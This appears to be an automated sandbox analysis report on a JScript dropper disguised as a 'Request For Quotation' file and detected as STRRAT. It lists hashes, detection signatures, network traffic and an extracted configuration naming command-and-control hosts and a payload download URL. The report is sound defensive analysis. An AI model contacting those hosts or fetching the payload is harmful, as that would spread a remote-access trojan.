Windows Analysis Report
Request For Quotation.js

Overview

General Information

Sample name: Request For Quotation.js
Analysis ID: 1532997
MD5: 6350bcd7fc5381cf37a3c3011d32d270
SHA1: 0be16c936ffbb3ed8f811da384c4629c5990d706
SHA256: 84315757f962b3883c39b1d1b583f4b7e59b0400fac2dbbcb203ff821fef7d8a
Tags: jsSTRRATuser-abuse_ch
Infos:

Detection

STRRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected STRRAT
JavaScript source code contains functionality to generate code involving a shell, file or stream
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected AllatoriJARObfuscator
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Queries the installed Java version
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection
barindex
Found malware configuration
Source: bszhidta.txt.0.dr Malware Configuration Extractor: STRRAT {"C2 list": "harold.jetos.com:3608", "url": "http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=5", "Proxy": "harold.jetos.com:3608", "lid": "khonsari", "Startup": "false", "Secondary Startup": "true", "Scheduled Task": "true"}
Multi AV Scanner detection for domain / URL
Source: http://wshsoft.company/jv/jrex.zip Virustotal: Detection: 13% Perma Link
Multi AV Scanner detection for submitted file
Source: Request For Quotation.js Virustotal: Detection: 14% Perma Link
Source: Request For Quotation.js ReversingLabs: Detection: 15%
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57601 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57603 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57602 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:57605 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57606 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57607 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57608 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:57609 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57610 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57612 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57611 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:57613 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57620 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57622 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57621 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:57628 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57660 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57661 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57659 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:57667 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57698 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:57711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:57750 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57776 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57777 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57778 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:57789 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57816 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57818 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:57829 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57854 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57855 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57857 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:57869 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57891 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57890 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57895 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:57908 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57913 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57914 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57915 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:57916 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57917 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57918 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57919 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:57920 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57921 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57923 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57922 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:57924 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57925 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57927 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57926 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:57928 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57929 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57931 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57930 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:57932 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57933 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57935 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57934 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:57936 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57937 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57939 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57938 version: TLS 1.2

Software Vulnerabilities
barindex
JavaScript source code contains functionality to generate code involving a shell, file or stream
Source: Request For Quotation.js Return value : ['"adodb.stream"'] Go to definition
Source: Request For Quotation.js Return value : ['"adodb.stream"'] Go to definition
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 4x nop then cmp eax, dword ptr [ecx+04h] 1_2_0282CAD8
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 199.232.192.209 199.232.192.209
Source: Joe Sandbox View IP Address: 140.82.121.3 140.82.121.3
Source: Joe Sandbox View IP Address: 140.82.121.3 140.82.121.3
Source: Joe Sandbox View IP Address: 140.82.121.4 140.82.121.4
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 026e5ca865ce1f09da3a81d8a4e3effb
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: repo1.maven.org
Source: global traffic DNS traffic detected: DNS query: github.com
Source: global traffic DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
Source: javaw.exe, 00000001.00000002.3036224528.0000000009D69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bugreport.sun.com/bugreport/
Source: javaw.exe, 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009DFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt
Source: javaw.exe, 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: javaw.exe, 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009DFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt
Source: javaw.exe, 00000001.00000002.3036224528.0000000009D69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: javaw.exe, 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009DFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
Source: javaw.exe, 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html
Source: javaw.exe, 00000001.00000002.3036224528.000000000A06E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.chambersign.org/chambersroot.crl
Source: javaw.exe, 00000001.00000002.3036224528.000000000A06E000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl
Source: javaw.exe, 00000001.00000002.3036224528.000000000A06E000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: javaw.exe, 00000001.00000002.3036224528.000000000A06E000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: javaw.exe, 00000001.00000002.3036224528.000000000A06E000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: javaw.exe, 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009E04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl
Source: javaw.exe, 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: javaw.exe, 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009E04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl
Source: javaw.exe, 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009D69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: javaw.exe, 00000001.00000002.3036224528.0000000009E0B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl
Source: javaw.exe, 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: javaw.exe, 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.oracle.com/
Source: javaw.exe, 00000001.00000002.3042627997.0000000014ED0000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009F14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://null.oracle.com/
Source: javaw.exe, 00000001.00000002.3036224528.0000000009DFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com
Source: javaw.exe, 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: javaw.exe, 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: javaw.exe, 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009D69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://policy.camerfirma.com
Source: javaw.exe, 00000001.00000002.3036224528.000000000A06E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://policy.camerfirma.com0
Source: javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://repository.swisssign.com/
Source: javaw.exe, 00000001.00000002.3036224528.000000000A06E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://repository.swisssign.com/0
Source: wscript.exe, 00000000.00000003.1740841774.0000014A21F47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1744318245.0000000705FD1000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1739880247.0000014A21D96000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1739987199.0000014A21D2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://wshsoft.company/jv/jrex.zip
Source: wscript.exe, 00000000.00000003.1738126859.0000014A21E51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://wshsoft.company/jv/jrex.zipleB
Source: javaw.exe, 00000001.00000002.3036224528.0000000009D63000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.allatori.com
Source: javaw.exe, 00000001.00000002.3036224528.000000000A19B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.chambersign.org
Source: javaw.exe, 00000001.00000002.3036224528.000000000A06E000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.chambersign.org1
Source: javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.quovadis.bm
Source: javaw.exe, 00000001.00000002.3036224528.0000000009F7B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.quovadisglobal.com/cps
Source: javaw.exe, 00000001.00000002.3036224528.000000000A06E000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: javaw.exe, 00000001.00000002.3033384553.0000000004B7B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3033384553.00000000049FE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3033384553.0000000004AB8000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3033384553.0000000004944000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3033384553.0000000004800000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com
Source: javaw.exe, 00000001.00000002.3033384553.0000000004800000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3033384553.00000000048AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/kristian/system-hook/releases/download/3.5/system-hook-3.5.jar
Source: javaw.exe, 00000001.00000002.3036224528.0000000009D63000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/kristian/system-hook/releases/download/3.5/system-hook-3.5.jar.1.jarar
Source: javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com
Source: javaw.exe, 00000001.00000002.3036224528.0000000009F7B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: javaw.exe, 00000001.00000002.3033384553.0000000004A4F000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3033384553.0000000004B04000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3033384553.000000000481E000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3033384553.00000000048D7000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3033384553.0000000004813000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3033384553.0000000004800000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3033384553.0000000004994000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repo1.maven.org
Source: javaw.exe, 00000001.00000002.3033384553.0000000004994000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3033384553.0000000004830000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repo1.maven.org/maven2/net/java/dev/jna/jna-platform/5.5.0/jna-platform-5.5.0.jar
Source: javaw.exe, 00000001.00000002.3033384553.0000000004994000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3033384553.0000000004830000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repo1.maven.org/maven2/net/java/dev/jna/jna/5.5.0/jna-5.5.0.jar
Source: javaw.exe, 00000001.00000002.3033384553.0000000004830000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repo1.maven.org/maven2/org/xerial/sqlite-jdbc/
Source: javaw.exe, 00000001.00000002.3033384553.0000000004994000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3033384553.0000000004830000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repo1.maven.org/maven2/org/xerial/sqlite-jdbc/3.14.2.1/sqlite-jdbc-3.14.2.1.jar
Source: javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repository.luxtrust.lu
Source: javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repository.luxtrust.lu0
Source: unknown Network traffic detected: HTTP traffic on port 57607 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57927
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57926
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57929
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57928
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57923
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57922
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57925
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57924
Source: unknown Network traffic detected: HTTP traffic on port 57622 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57920 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57921
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57920
Source: unknown Network traffic detected: HTTP traffic on port 57857 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57895
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57891
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57890
Source: unknown Network traffic detected: HTTP traffic on port 57937 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 57914 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 57931 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57908 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57938
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57816
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57937
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57818
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57939
Source: unknown Network traffic detected: HTTP traffic on port 57816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57934
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57659
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57933
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57815
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57936
Source: unknown Network traffic detected: HTTP traffic on port 57925 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57935
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57930
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
